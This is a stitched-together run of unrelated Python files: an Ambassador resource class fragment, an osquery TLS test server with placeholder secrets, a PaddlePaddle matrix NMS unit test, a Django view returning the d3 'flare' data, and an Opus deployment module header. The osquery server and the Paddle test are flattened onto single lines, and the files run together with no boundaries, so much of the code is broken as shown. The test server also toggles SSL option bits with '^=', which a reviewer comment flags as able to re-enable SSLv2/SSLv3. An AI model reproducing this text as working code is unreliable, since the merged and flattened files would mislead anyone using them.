        return ad

    def as_json(self):
        return dump_json(self.as_dict(), pretty=True)

    @classmethod
    def from_resource(cls: Type[R], other: R,
                      rkey: Optional[str]=None,
                      location: Optional[str]=None,
                      kind: Optional[str]=None,
                      serialization: Optional[str]=None,
                      **kwargs) -> R:
        """
        Create a Resource by copying another Resource, possibly overriding
        elements along the way.

        NOTE WELL: if you pass in kwargs, we assume that any values are safe
        to use as-is and DO NOT COPY THEM. Otherwise, we SHALLOW COPY
        other.attrs for the new Resource.

        :param other: the base Resource we're copying
        :param rkey: optional new rkey
        :param location: optional new location
        :param kind: optional new kind
        :param serialization: optional new original input serialization
        :param kwargs: optional new key-value pairs -- see discussion about copying above!
        """

        # rkey and location are required positional arguments. Fine.
        new_rkey = rkey or other.rkey
        new_location = location or other.location

        # Make a shallow-copied dict that we can muck with...
        new_attrs = dict(kwargs) if kwargs else dict(other)

        # Don't include kind unless it comes in on this call.
        if kind:
            new_attrs['kind'] = kind
        else:
            new_attrs.pop('kind', None)

        # Don't include serialization at all if we don't have one.
        if serialization:
            new_attrs['serialization'] = serialization
        elif other.serialization:
            new_attrs['serialization'] = other.serialization

        # Make sure that things that shouldn't propagate are gone...
        new_attrs.pop('rkey', None)
        new_attrs.pop('location', None)
        new_attrs.pop('_errors', None)
        new_attrs.pop('_errored', None)
        new_attrs.pop('_referenced_by', None)

        # ...and finally, use new_attrs for all the keyword args when we set
        # up the new instance.
        return cls(new_rkey, new_location, **new_attrs)

    @classmethod
    def from_dict(cls: Type[R], rkey: str, location: str,
                  serialization: Optional[str], attrs: Dict) -> R:
        """
        Create a Resource or subclass thereof from a dictionary. The new
        Resource's rkey and location must be handed in explicitly.

        The difference between this and simply intializing a Resource object
        is that from_dict will introspect the attrs passed in and create
        whatever kind of Resource matches attrs['kind'] -- so for example, if
        kind is "Mapping", this method will return a Mapping rather than a
        Resource.

        :param rkey: unique identifier for this source, should be short
        :param location: where should a human go to find the source of this resource?
        :param serialization: original input serialization of obj
        :param attrs: dictionary from which to initialize the new object
        """

        # So this is a touch odd but here we go. We want to use the Kind here
        # to find the correct type.
        ambassador = sys.modules['ambassador']
        resource_class: Type[R] = getattr(ambassador, attrs['kind'], None)

        if not resource_class:
            # Fall back to the "AC"-prefixed (Ambassador-config) variant,
            # and finally to cls itself if neither name exists.
            resource_class = getattr(ambassador, 'AC' + attrs['kind'], cls)

        # print("%s.from_dict: %s => %s" % (cls, attrs['kind'], resource_class))

        return resource_class(rkey, location=location,
                              serialization=serialization, **attrs)

    @classmethod
    def from_yaml(cls: Type[R], rkey: str, location: str,
                  serialization: str) -> R:
        """
        Create a Resource from a YAML serialization. The new Resource's rkey
        and location must be handed in explicitly, and of course in this case
        the serialization is mandatory.

        Raises an exception if the serialization is not parseable.

        :param rkey: unique identifier for this source, should be short
        :param location: where should a human go to find the source of this resource?
        :param serialization: original input serialization of obj
        """

        attrs = parse_yaml(serialization)

        return cls.from_dict(rkey, location, serialization, attrs)
#!/usr/bin/env python # Copyright (c) 2014, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. An additional grant # of patent rights can be found in the PATENTS file in the same directory. from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import argparse import json import os import signal import ssl import sys # Create a simple TLS/HTTP server. from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from urlparse import parse_qs EXAMPLE_CONFIG = { "schedule": { "tls_proc": {"query": "select * from processes", "interval": 0}, } } EXAMPLE_DISTRIBUTED = { "queries": { "info": "select * from osquery_info", "flags": "select * from osquery_flags", } } TEST_RESPONSE = { "foo": "bar", } NODE_KEYS = [ "this_is_a_node_secret", "this_is_also_a_node_secret", ] FAILED_ENROLL_RESPONSE = { "node_invalid": True } ENROLL_RESPONSE = { "node_key": "this_is_a_node_secret" } def debug(response): print("-- [DEBUG] %s" % str(response)) class RealSimpleHandler(BaseHTTPRequestHandler): def _set_headers(self): self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() def do_GET(self): debug("RealSimpleHandler::get %s" % self.path) self._set_headers() self._reply(TEST_RESPONSE) def do_HEAD(self): debug("RealSimpleHandler::head %s" % self.path) self._set_headers() def do_POST(self): debug("RealSimpleHandler::post %s" % self.path) self._set_headers() content_len = int(self.headers.getheader('content-length', 0)) request = json.loads(self.rfile.read(content_len)) debug("Request: %s" % str(request)) if self.path == '/enroll': self.enroll(request) elif self.path == '/config': self.config(request) elif self.path == '/log': self.log(request) elif self.path == '/distributed_read': self.distributed_read(request) elif self.path == 
'/distributed_write': self.distributed_write(request) else: self._reply(TEST_RESPONSE) def enroll(self, request): '''A basic enrollment endpoint''' # This endpoint expects an "enroll_secret" POST body variable. # Over TLS, this string may be a shared secret value installed on every # managed host in an enterprise. # Alternatively, each client could authenticate with a TLS client cert. # Then, access to the enrollment endpoint implies the required auth. # A generated node_key is still supplied for identification. if ARGS.use_enroll_secret and ENROLL_SECRET != request["enroll_secret"]: self._reply(FAILED_ENROLL_RESPONSE) return self._reply(ENROLL_RESPONSE) def config(self, request): '''A basic config endpoint''' # This endpoint responds with a JSON body that is the entire config # content. There is no special key or status. # Authorization is simple authentication (the ability to download the # config data) using a "valid" node_key. Validity means the node_key is # known to this server. This toy server delivers a shared node_key, # imagine generating a unique node_key per enroll request, tracking the # generated keys, and asserting a match. # The osquery TLS config plugin calls the TLS enroll plugin to retrieve # a node_key, then submits that key alongside config/logger requests. 
        # Authorize by node_key: the request must carry a key known to this
        # server (NODE_KEYS); otherwise answer with the enrollment failure
        # message so the client falls back to re-enrolling.
        if "node_key" not in request or request["node_key"] not in NODE_KEYS:
            self._reply(FAILED_ENROLL_RESPONSE)
            return
        self._reply(EXAMPLE_CONFIG)

    def distributed_read(self, request):
        '''A basic distributed read endpoint'''
        # Same node_key-based authorization as the config endpoint.
        if "node_key" not in request or request["node_key"] not in NODE_KEYS:
            self._reply(FAILED_ENROLL_RESPONSE)
            return
        self._reply(EXAMPLE_DISTRIBUTED)

    def distributed_write(self, request):
        '''A basic distributed write endpoint'''
        # Accept and discard distributed query results; reply with an empty
        # JSON object (success).
        self._reply({})

    def log(self, request):
        # Logger endpoint: accept and discard submitted logs.
        self._reply({})

    def _reply(self, response):
        # Serialize the response dict as JSON onto the client socket.
        debug("Replying: %s" % (str(response)))
        self.wfile.write(json.dumps(response))


def handler(signum, frame):
    # SIGALRM handler: ends a non --persist run after --timeout seconds.
    print("[DEBUG] Shutting down HTTP server via timeout (%d) seconds." % (ARGS.timeout))
    sys.exit(0)


if __name__ == '__main__':
    SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))

    parser = argparse.ArgumentParser(description=(
        "osquery python https server for client TLS testing."
    ))
    parser.add_argument(
        "--tls", default=False, action="store_true",
        help="Wrap the HTTP server socket in TLS."
    )
    # NOTE(review): the help text below was copy-pasted from --tls and does
    # not describe --persist (which keeps the server running instead of
    # exiting after --timeout seconds) -- worth fixing.
    parser.add_argument(
        "--persist", default=False, action="store_true",
        help="Wrap the HTTP server socket in TLS."
    )
    parser.add_argument(
        "--timeout", default=10, type=int,
        help="If not persisting, exit after a number of seconds"
    )
    parser.add_argument(
        "--cert", metavar="CERT_FILE",
        default=SCRIPT_DIR + "/test_server.pem",
        help="TLS server cert."
    )
    parser.add_argument(
        "--key", metavar="PRIVATE_KEY_FILE",
        default=SCRIPT_DIR + "/test_server.key",
        help="TLS server cert private key."
    )
    parser.add_argument(
        "--ca", metavar="CA_FILE",
        default=SCRIPT_DIR + "/test_server_ca.pem",
        help="TLS server CA list for client-auth."
    )
    parser.add_argument(
        "--use_enroll_secret", action="store_true", default=True,
        help="Require an enrollment secret for node enrollment"
    )
    parser.add_argument(
        "--enroll_secret", metavar="SECRET_FILE",
        default=SCRIPT_DIR + "/test_enroll_secret.txt",
        help="File containing enrollment secret"
    )
    parser.add_argument(
        "port", metavar="PORT", type=int,
        help="Bind to which local TCP port."
    )

    ARGS = parser.parse_args()

    # Load the shared enrollment secret (if required) before serving; a
    # missing secret file is a fatal configuration error.
    ENROLL_SECRET = ""
    if ARGS.use_enroll_secret:
        try:
            with open(ARGS.enroll_secret, "r") as fh:
                ENROLL_SECRET = fh.read().strip()
        except IOError as e:
            print("Cannot read --enroll_secret: %s" % str(e))
            exit(1)

    if not ARGS.persist:
        # Arrange for the process to exit after --timeout seconds.
        signal.signal(signal.SIGALRM, handler)
        signal.alarm(ARGS.timeout)

    httpd = HTTPServer(('localhost', ARGS.port), RealSimpleHandler)
    if ARGS.tls:
        if 'SSLContext' in vars(ssl):
            # Modern path: build an SSLContext with the server cert/key and
            # the CA list used for client-auth.
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.load_cert_chain(ARGS.cert, keyfile=ARGS.key)
            ctx.load_verify_locations(capath=ARGS.ca)
            # NOTE(review): '^=' *toggles* these option bits; if either
            # OP_NO_SSLv2 or OP_NO_SSLv3 were already set on the context this
            # would re-enable the legacy protocol. '|=' is the conventional
            # way to disable SSLv2/SSLv3 -- confirm intent.
            ctx.options ^= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
            httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
        else:
            # Older Pythons without SSLContext: fall back to wrap_socket.
            httpd.socket = ssl.wrap_socket(httpd.socket,
                ca_certs=ARGS.ca,
                ssl_version=ssl.PROTOCOL_SSLv23,
                certfile=ARGS.cert,
                keyfile=ARGS.key,
                server_side=True)
        debug("Starting TLS/HTTPS server on TCP port: %d" % ARGS.port)
    else:
        debug("Starting HTTP server on TCP port: %d" % ARGS.port)
    httpd.serve_forever()
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import unittest import numpy as np import copy from op_test import OpTest import paddle.fluid as fluid from paddle.fluid import Program, program_guard def softmax(x): # clip to shiftx, otherwise, when calc loss with # log(exp(shiftx)), may get log(0)=INF shiftx = (x - np.max(x)).clip(-64.) exps = np.exp(shiftx) return exps / np.sum(exps) def iou_matrix(a, b, norm=True): tl_i = np.maximum(a[:, np.newaxis, :2], b[:, :2]) br_i = np.minimum(a[:, np.newaxis, 2:], b[:, 2:]) pad = not norm and 1 or 0 area_i = np.prod(br_i - tl_i + pad, axis=2) * (tl_i < br_i).all(axis=2) area_a = np.prod(a[:, 2:] - a[:, :2] + pad, axis=1) area_b = np.prod(b[:, 2:] - b[:, :2] + pad, axis=1) area_o = (area_a[:, np.newaxis] + area_b - area_i) return area_i / (area_o + 1e-10) def matrix_nms(boxes, scores, score_threshold, post_threshold=0., nms_top_k=400, normalized=True, use_gaussian=False, gaussian_sigma=2.): all_scores = copy.deepcopy(scores) all_scores = all_scores.flatten() selected_indices = np.where(all_scores > score_threshold)[0] all_scores = all_scores[selected_indices] sorted_indices = np.argsort(-all_scores, axis=0, kind='mergesort') sorted_scores = all_scores[sorted_indices] sorted_indices = selected_indices[sorted_indices] if nms_top_k > -1 and nms_top_k < sorted_indices.shape[0]: sorted_indices = sorted_indices[:nms_top_k] sorted_scores = 
sorted_scores[:nms_top_k] selected_boxes = boxes[sorted_indices, :] ious = iou_matrix(selected_boxes, selected_boxes) ious = np.triu(ious, k=1) iou_cmax = ious.max(0) N = iou_cmax.shape[0] iou_cmax = np.repeat(iou_cmax[:, np.newaxis], N, axis=1) if use_gaussian: decay = np.exp((iou_cmax**2 - ious**2) * gaussian_sigma) else: decay = (1 - ious) / (1 - iou_cmax) decay = decay.min(0) decayed_scores = sorted_scores * decay if post_threshold > 0.: inds = np.where(decayed_scores > post_threshold)[0] selected_boxes = selected_boxes[inds, :] decayed_scores = decayed_scores[inds] sorted_indices = sorted_indices[inds] return decayed_scores, selected_boxes, sorted_indices def multiclass_nms(boxes, scores, background, score_threshold, post_threshold, nms_top_k, keep_top_k, normalized, use_gaussian, gaussian_sigma): all_boxes = [] all_cls = [] all_scores = [] all_indices = [] for c in range(scores.shape[0]): if c == background: continue decayed_scores, selected_boxes, indices = matrix_nms( boxes, scores[c], score_threshold, post_threshold, nms_top_k, normalized, use_gaussian, gaussian_sigma) all_cls.append(np.full(len(decayed_scores), c, decayed_scores.dtype)) all_boxes.append(selected_boxes) all_scores.append(decayed_scores) all_indices.append(indices) all_cls = np.concatenate(all_cls) all_boxes = np.concatenate(all_boxes) all_scores = np.concatenate(all_scores) all_indices = np.concatenate(all_indices) all_pred = np.concatenate( (all_cls[:, np.newaxis], all_scores[:, np.newaxis], all_boxes), axis=1) num_det = len(all_pred) if num_det == 0: return all_pred, np.array([], dtype=np.float32) inds = np.argsort(-all_scores, axis=0, kind='mergesort') all_pred = all_pred[inds, :] all_indices = all_indices[inds] if keep_top_k > -1 and num_det > keep_top_k: num_det = keep_top_k all_pred = all_pred[:keep_top_k, :] all_indices = all_indices[:keep_top_k] return all_pred, all_indices def batched_multiclass_nms(boxes, scores, background, score_threshold, post_threshold, nms_top_k, keep_top_k, 
normalized=True, use_gaussian=False, gaussian_sigma=2.): batch_size = scores.shape[0] det_outs = [] index_outs = [] lod = [] for n in range(batch_size): nmsed_outs, indices = multiclass_nms( boxes[n], scores[n], background, score_threshold, post_threshold, nms_top_k, keep_top_k, normalized, use_gaussian, gaussian_sigma) nmsed_num = len(nmsed_outs) lod.append(nmsed_num) if nmsed_num == 0: continue indices += n * scores.shape[2] det_outs.append(nmsed_outs) index_outs.append(indices) if det_outs: det_outs = np.concatenate(det_outs) index_outs = np.concatenate(index_outs) return det_outs, index_outs, lod class TestMatrixNMSOp(OpTest): def set_argument(self): self.post_threshold = 0. self.use_gaussian = False def setUp(self): self.set_argument() N = 7 M = 1200 C = 21 BOX_SIZE = 4 background = 0 nms_top_k = 400 keep_top_k = 200 score_threshold = 0.01 post_threshold = self.post_threshold use_gaussian = False if hasattr(self, 'use_gaussian'): use_gaussian = self.use_gaussian gaussian_sigma = 2. 
scores = np.random.random((N * M, C)).astype('float32') scores = np.apply_along_axis(softmax, 1, scores) scores = np.reshape(scores, (N, M, C)) scores = np.transpose(scores, (0, 2, 1)) boxes = np.random.random((N, M, BOX_SIZE)).astype('float32') boxes[:, :, 0:2] = boxes[:, :, 0:2] * 0.5 boxes[:, :, 2:4] = boxes[:, :, 2:4] * 0.5 + 0.5 det_outs, index_outs, lod = batched_multiclass_nms( boxes, scores, background, score_threshold, post_threshold, nms_top_k, keep_top_k, True, use_gaussian, gaussian_sigma) empty = len(det_outs) == 0 det_outs = np.array([], dtype=np.float32) if empty else det_outs index_outs = np.array([], dtype=np.float32) if empty else index_outs nmsed_outs = det_outs.astype('float32') self.op_type = 'matrix_nms' self.inputs = {'BBoxes': boxes, 'Scores': scores} self.outputs = { 'Out': (nmsed_outs, [lod]), 'Index': (index_outs[:, None], [lod]), 'RoisNum': np.array(lod).astype('int32') } self.attrs = { 'background_label': 0, 'nms_top_k': nms_top_k, 'keep_top_k': keep_top_k, 'score_threshold': score_threshold, 'post_threshold': post_threshold, 'use_gaussian': use_gaussian, 'gaussian_sigma': gaussian_sigma, 'normalized': True, } def test_check_output(self): self.check_output() class TestMatrixNMSOpNoOutput(TestMatrixNMSOp): def set_argument(self): self.post_threshold = 2.0 class TestMatrixNMSOpGaussian(TestMatrixNMSOp): def set_argument(self): self.post_threshold = 0. self.use_gaussian = True class TestMatrixNMSError(unittest.TestCase): def test_errors(self): with program_guard(Program(), Program()): M = 1200 N = 7 C = 21 BOX_SIZE = 4 nms_top_k = 400 keep_top_k = 200 score_threshold = 0.01 post_threshold = 0. 
boxes_np = np.random.random((M, C, BOX_SIZE)).astype('float32') scores = np.random.random((N * M, C)).astype('float32') scores = np.apply_along_axis(softmax, 1, scores) scores = np.reshape(scores, (N, M, C)) scores_np = np.transpose(scores, (0, 2, 1)) boxes_data = fluid.data( name='bboxes', shape=[M, C, BOX_SIZE], dtype='float32') scores_data = fluid.data( name='scores', shape=[N, C, M], dtype='float32') def test_bboxes_Variable(): # the bboxes type must be Variable fluid.layers.matrix_nms( bboxes=boxes_np, scores=scores_data, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=score_threshold, post_threshold=post_threshold) def test_scores_Variable(): # the scores type must be Variable fluid.layers.matrix_nms( bboxes=boxes_data, scores=scores_np, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=score_threshold, post_threshold=post_threshold) def test_empty(): # when all score are lower than threshold try: fluid.layers.matrix_nms( bboxes=boxes_data, scores=scores_data, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=10., post_threshold=post_threshold) except Exception as e: self.fail(e) def test_coverage(): # cover correct workflow try: fluid.layers.matrix_nms( bboxes=boxes_data, scores=scores_data, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=score_threshold, post_threshold=post_threshold) except Exception as e: self.fail(e) self.assertRaises(TypeError, test_bboxes_Variable) self.assertRaises(TypeError, test_scores_Variable) test_coverage() if __name__ == '__main__': unittest.main()
from student.apps.courses.models import Course
import json
from django.forms.models import model_to_dict
from core.apps.tools.common import render_json, dump_and_render_json, error_form_serialization

# Static copy of the classic d3 "flare" package hierarchy: each node has a
# "name" and either "children" (internal node) or "size" (leaf). Served
# verbatim by init() below (e.g. for treemap/sunburst visualization demos).
data = {
    "name": "flare",
    "children": [
        {
            "name": "analytics",
            "children": [
                {
                    "name": "cluster",
                    "children": [
                        {"name": "AgglomerativeCluster", "size": 3938},
                        {"name": "CommunityStructure", "size": 3812},
                        {"name": "HierarchicalCluster", "size": 6714},
                        {"name": "MergeEdge", "size": 743}
                    ]
                },
                {
                    "name": "graph",
                    "children": [
                        {"name": "BetweennessCentrality", "size": 3534},
                        {"name": "LinkDistance", "size": 5731},
                        {"name": "MaxFlowMinCut", "size": 7840},
                        {"name": "ShortestPaths", "size": 5914},
                        {"name": "SpanningTree", "size": 3416}
                    ]
                },
                {
                    "name": "optimization",
                    "children": [
                        {"name": "AspectRatioBanker", "size": 7074}
                    ]
                }
            ]
        },
        {
            "name": "animate",
            "children": [
                {"name": "Easing", "size": 17010},
                {"name": "FunctionSequence", "size": 5842},
                {
                    "name": "interpolate",
                    "children": [
                        {"name": "ArrayInterpolator", "size": 1983},
                        {"name": "ColorInterpolator", "size": 2047},
                        {"name": "DateInterpolator", "size": 1375},
                        {"name": "Interpolator", "size": 8746},
                        {"name": "MatrixInterpolator", "size": 2202},
                        {"name": "NumberInterpolator", "size": 1382},
                        {"name": "ObjectInterpolator", "size": 1629},
                        {"name": "PointInterpolator", "size": 1675},
                        {"name": "RectangleInterpolator", "size": 2042}
                    ]
                },
                {"name": "ISchedulable", "size": 1041},
                {"name": "Parallel", "size": 5176},
                {"name": "Pause", "size": 449},
                {"name": "Scheduler", "size": 5593},
                {"name": "Sequence", "size": 5534},
                {"name": "Transition", "size": 9201},
                {"name": "Transitioner", "size": 19975},
                {"name": "TransitionEvent", "size": 1116},
                {"name": "Tween", "size": 6006}
            ]
        },
        {
            "name": "data",
            "children": [
                {
                    "name": "converters",
                    "children": [
                        {"name": "Converters", "size": 721},
                        {"name": "DelimitedTextConverter", "size": 4294},
                        {"name": "GraphMLConverter", "size": 9800},
                        {"name": "IDataConverter", "size": 1314},
                        {"name": "JSONConverter", "size": 2220}
                    ]
                },
                {"name": "DataField", "size": 1759},
                {"name": "DataSchema", "size": 2165},
                {"name": "DataSet", "size": 586},
                {"name": "DataSource", "size": 3331},
                {"name": "DataTable", "size": 772},
                {"name": "DataUtil", "size": 3322}
            ]
        },
        {
            "name": "display",
            "children": [
                {"name": "DirtySprite", "size": 8833},
                {"name": "LineSprite", "size": 1732},
                {"name": "RectSprite", "size": 3623},
                {"name": "TextSprite", "size": 10066}
            ]
        },
        {
            "name": "flex",
            "children": [
                {"name": "FlareVis", "size": 4116}
            ]
        },
        {
            "name": "physics",
            "children": [
                {"name": "DragForce", "size": 1082},
                {"name": "GravityForce", "size": 1336},
                {"name": "IForce", "size": 319},
                {"name": "NBodyForce", "size": 10498},
                {"name": "Particle", "size": 2822},
                {"name": "Simulation", "size": 9983},
                {"name": "Spring", "size": 2213},
                {"name": "SpringForce", "size": 1681}
            ]
        },
        {
            "name": "query",
            "children": [
                {"name": "AggregateExpression", "size": 1616},
                {"name": "And", "size": 1027},
                {"name": "Arithmetic", "size": 3891},
                {"name": "Average", "size": 891},
                {"name": "BinaryExpression", "size": 2893},
                {"name": "Comparison", "size": 5103},
                {"name": "CompositeExpression", "size": 3677},
                {"name": "Count", "size": 781},
                {"name": "DateUtil", "size": 4141},
                {"name": "Distinct", "size": 933},
                {"name": "Expression", "size": 5130},
                {"name": "ExpressionIterator", "size": 3617},
                {"name": "Fn", "size": 3240},
                {"name": "If", "size": 2732},
                {"name": "IsA", "size": 2039},
                {"name": "Literal", "size": 1214},
                {"name": "Match", "size": 3748},
                {"name": "Maximum", "size": 843},
                {
                    "name": "methods",
                    "children": [
                        {"name": "add", "size": 593},
                        {"name": "and", "size": 330},
                        {"name": "average", "size": 287},
                        {"name": "count", "size": 277},
                        {"name": "distinct", "size": 292},
                        {"name": "div", "size": 595},
                        {"name": "eq", "size": 594},
                        {"name": "fn", "size": 460},
                        {"name": "gt", "size": 603},
                        {"name": "gte", "size": 625},
                        {"name": "iff", "size": 748},
                        {"name": "isa", "size": 461},
                        {"name": "lt", "size": 597},
                        {"name": "lte", "size": 619},
                        {"name": "max", "size": 283},
                        {"name": "min", "size": 283},
                        {"name": "mod", "size": 591},
                        {"name": "mul", "size": 603},
                        {"name": "neq", "size": 599},
                        {"name": "not", "size": 386},
                        {"name": "or", "size": 323},
                        {"name": "orderby", "size": 307},
                        {"name": "range", "size": 772},
                        {"name": "select", "size": 296},
                        {"name": "stddev", "size": 363},
                        {"name": "sub", "size": 600},
                        {"name": "sum", "size": 280},
                        {"name": "update", "size": 307},
                        {"name": "variance", "size": 335},
                        {"name": "where", "size": 299},
                        {"name": "xor", "size": 354},
                        {"name": "_", "size": 264}
                    ]
                },
                {"name": "Minimum", "size": 843},
                {"name": "Not", "size": 1554},
                {"name": "Or", "size": 970},
                {"name": "Query", "size": 13896},
                {"name": "Range", "size": 1594},
                {"name": "StringUtil", "size": 4130},
                {"name": "Sum", "size": 791},
                {"name": "Variable", "size": 1124},
                {"name": "Variance", "size": 1876},
                {"name": "Xor", "size": 1101}
            ]
        },
        {
            "name": "scale",
            "children": [
                {"name": "IScaleMap", "size": 2105},
                {"name": "LinearScale", "size": 1316},
                {"name": "LogScale", "size": 3151},
                {"name": "OrdinalScale", "size": 3770},
                {"name": "QuantileScale", "size": 2435},
                {"name": "QuantitativeScale", "size": 4839},
                {"name": "RootScale", "size": 1756},
                {"name": "Scale", "size": 4268},
                {"name": "ScaleType", "size": 1821},
                {"name": "TimeScale", "size": 5833}
            ]
        },
        {
            "name": "util",
            "children": [
                {"name": "Arrays", "size": 8258},
                {"name": "Colors", "size": 10001},
                {"name": "Dates", "size": 8217},
                {"name": "Displays", "size": 12555},
                {"name": "Filter", "size": 2324},
                {"name": "Geometry", "size": 10993},
                {
                    "name": "heap",
                    "children": [
                        {"name": "FibonacciHeap", "size": 9354},
                        {"name": "HeapNode", "size": 1233}
                    ]
                },
                {"name": "IEvaluable", "size": 335},
                {"name": "IPredicate", "size": 383},
                {"name": "IValueProxy", "size": 874},
                {
                    "name": "math",
                    "children": [
                        {"name": "DenseMatrix", "size": 3165},
                        {"name": "IMatrix", "size": 2815},
                        {"name": "SparseMatrix", "size": 3366}
                    ]
                },
                {"name": "Maths", "size": 17705},
                {"name": "Orientation", "size": 1486},
                {
                    "name": "palette",
                    "children": [
                        {"name": "ColorPalette", "size": 6367},
                        {"name": "Palette", "size": 1229},
                        {"name": "ShapePalette", "size": 2059},
                        {"name": "SizePalette", "size": 2291}
                    ]
                },
                {"name": "Property", "size": 5559},
                {"name": "Shapes", "size": 19118},
                {"name": "Sort", "size": 6887},
                {"name": "Stats", "size": 6557},
                {"name": "Strings", "size": 22026}
            ]
        },
        {
            "name": "vis",
            "children": [
                {
                    "name": "axis",
                    "children": [
                        {"name": "Axes", "size": 1302},
                        {"name": "Axis", "size": 24593},
                        {"name": "AxisGridLine", "size": 652},
                        {"name": "AxisLabel", "size": 636},
                        {"name": "CartesianAxes", "size": 6703}
                    ]
                },
                {
                    "name": "controls",
                    "children": [
                        {"name": "AnchorControl", "size": 2138},
                        {"name": "ClickControl", "size": 3824},
                        {"name": "Control", "size": 1353},
                        {"name": "ControlList", "size": 4665},
                        {"name": "DragControl", "size": 2649},
                        {"name": "ExpandControl", "size": 2832},
                        {"name": "HoverControl", "size": 4896},
                        {"name": "IControl", "size": 763},
                        {"name": "PanZoomControl", "size": 5222},
                        {"name": "SelectionControl", "size": 7862},
                        {"name": "TooltipControl", "size": 8435}
                    ]
                },
                {
                    "name": "data",
                    "children": [
                        {"name": "Data", "size": 20544},
                        {"name": "DataList", "size": 19788},
                        {"name": "DataSprite", "size": 10349},
                        {"name": "EdgeSprite", "size": 3301},
                        {"name": "NodeSprite", "size": 19382},
                        {
                            "name": "render",
                            "children": [
                                {"name": "ArrowType", "size": 698},
                                {"name": "EdgeRenderer", "size": 5569},
                                {"name": "IRenderer", "size": 353},
                                {"name": "ShapeRenderer", "size": 2247}
                            ]
                        },
                        {"name": "ScaleBinding", "size": 11275},
                        {"name": "Tree", "size": 7147},
                        {"name": "TreeBuilder", "size": 9930}
                    ]
                },
                {
                    "name": "events",
                    "children": [
                        {"name": "DataEvent", "size": 2313},
                        {"name": "SelectionEvent", "size": 1880},
                        {"name": "TooltipEvent", "size": 1701},
                        {"name": "VisualizationEvent", "size": 1117}
                    ]
                },
                {
                    "name": "legend",
                    "children": [
                        {"name": "Legend", "size": 20859},
                        {"name": "LegendItem", "size": 4614},
                        {"name": "LegendRange", "size": 10530}
                    ]
                },
                {
                    "name": "operator",
                    "children": [
                        {
                            "name": "distortion",
                            "children": [
                                {"name": "BifocalDistortion", "size": 4461},
                                {"name": "Distortion", "size": 6314},
                                {"name": "FisheyeDistortion", "size": 3444}
                            ]
                        },
                        {
                            "name": "encoder",
                            "children": [
                                {"name": "ColorEncoder", "size": 3179},
                                {"name": "Encoder", "size": 4060},
                                {"name": "PropertyEncoder", "size": 4138},
                                {"name": "ShapeEncoder", "size": 1690},
                                {"name": "SizeEncoder", "size": 1830}
                            ]
                        },
                        {
                            "name": "filter",
                            "children": [
                                {"name": "FisheyeTreeFilter", "size": 5219},
                                {"name": "GraphDistanceFilter", "size": 3165},
                                {"name": "VisibilityFilter", "size": 3509}
                            ]
                        },
                        {"name": "IOperator", "size": 1286},
                        {
                            "name": "label",
                            "children": [
                                {"name": "Labeler", "size": 9956},
                                {"name": "RadialLabeler", "size": 3899},
                                {"name": "StackedAreaLabeler", "size": 3202}
                            ]
                        },
                        {
                            "name": "layout",
                            "children": [
                                {"name": "AxisLayout", "size": 6725},
                                {"name": "BundledEdgeRouter", "size": 3727},
                                {"name": "CircleLayout", "size": 9317},
                                {"name": "CirclePackingLayout", "size": 12003},
                                {"name": "DendrogramLayout", "size": 4853},
                                {"name": "ForceDirectedLayout", "size": 8411},
                                {"name": "IcicleTreeLayout", "size": 4864},
                                {"name": "IndentedTreeLayout", "size": 3174},
                                {"name": "Layout", "size": 7881},
                                {"name": "NodeLinkTreeLayout", "size": 12870},
                                {"name": "PieLayout", "size": 2728},
                                {"name": "RadialTreeLayout", "size": 12348},
                                {"name": "RandomLayout", "size": 870},
                                {"name": "StackedAreaLayout", "size": 9121},
                                {"name": "TreeMapLayout", "size": 9191}
                            ]
                        },
                        {"name": "Operator", "size": 2490},
                        {"name": "OperatorList", "size": 5248},
                        {"name": "OperatorSequence", "size": 4190},
                        {"name": "OperatorSwitch", "size": 2581},
                        {"name": "SortOperator", "size": 2023}
                    ]
                },
                {"name": "Visualization", "size": 16540}
            ]
        }
    ]
}


def init (request):
    """Return the static flare hierarchy as a JSON HTTP response."""
    # NOTE(review): the `encoding` keyword of json.dumps() is Python-2 only
    # (it was removed in Python 3, where passing it raises TypeError). The
    # data above is pure ASCII, so the argument is redundant anyway --
    # drop it before any Python 3 port.
    return render_json(request, json.dumps(data, encoding="utf-8"))
##############################################################################
# Copyright 2010 North Carolina State University                             #
#                                                                            #
# Licensed under the Apache License, Version 2.0 (the "License");            #
# you may not use this file except in compliance with the License.           #
# You may obtain a copy of the License at                                    #
#                                                                            #
#     http://www.apache.org/licenses/LICENSE-2.0                             #
#                                                                            #
# Unless required by applicable law or agreed to in writing, software        #
# distributed under the License is distributed on an "AS IS" BASIS,          #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   #
# See the License for the specific language governing permissions and        #
# limitations under the License.                                             #
##############################################################################

# NOTE: this module is Python 2 (`except X, e`, dict.iteritems, urllib2).
import functools
import json
import urllib2
import os.path

from opus.project.deployment import models, forms
import opus.lib.builder
import opus.lib.deployer
from opus.lib.deployer import DeploymentException
import opus.lib.log
from opus.project.deployment import tasks
import opus.project.deployment.database
log = opus.lib.log.get_logger()

from django.conf import settings
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ValidationError


def render(templatename, params, request, code=200):
    # Thin wrapper over render_to_response that also sets the status code
    # and forces an HTML content type.
    response = render_to_response(templatename,
            params,
            context_instance=RequestContext(request))
    response.status_code = code
    response['Content-Type'] = "text/html"
    return response

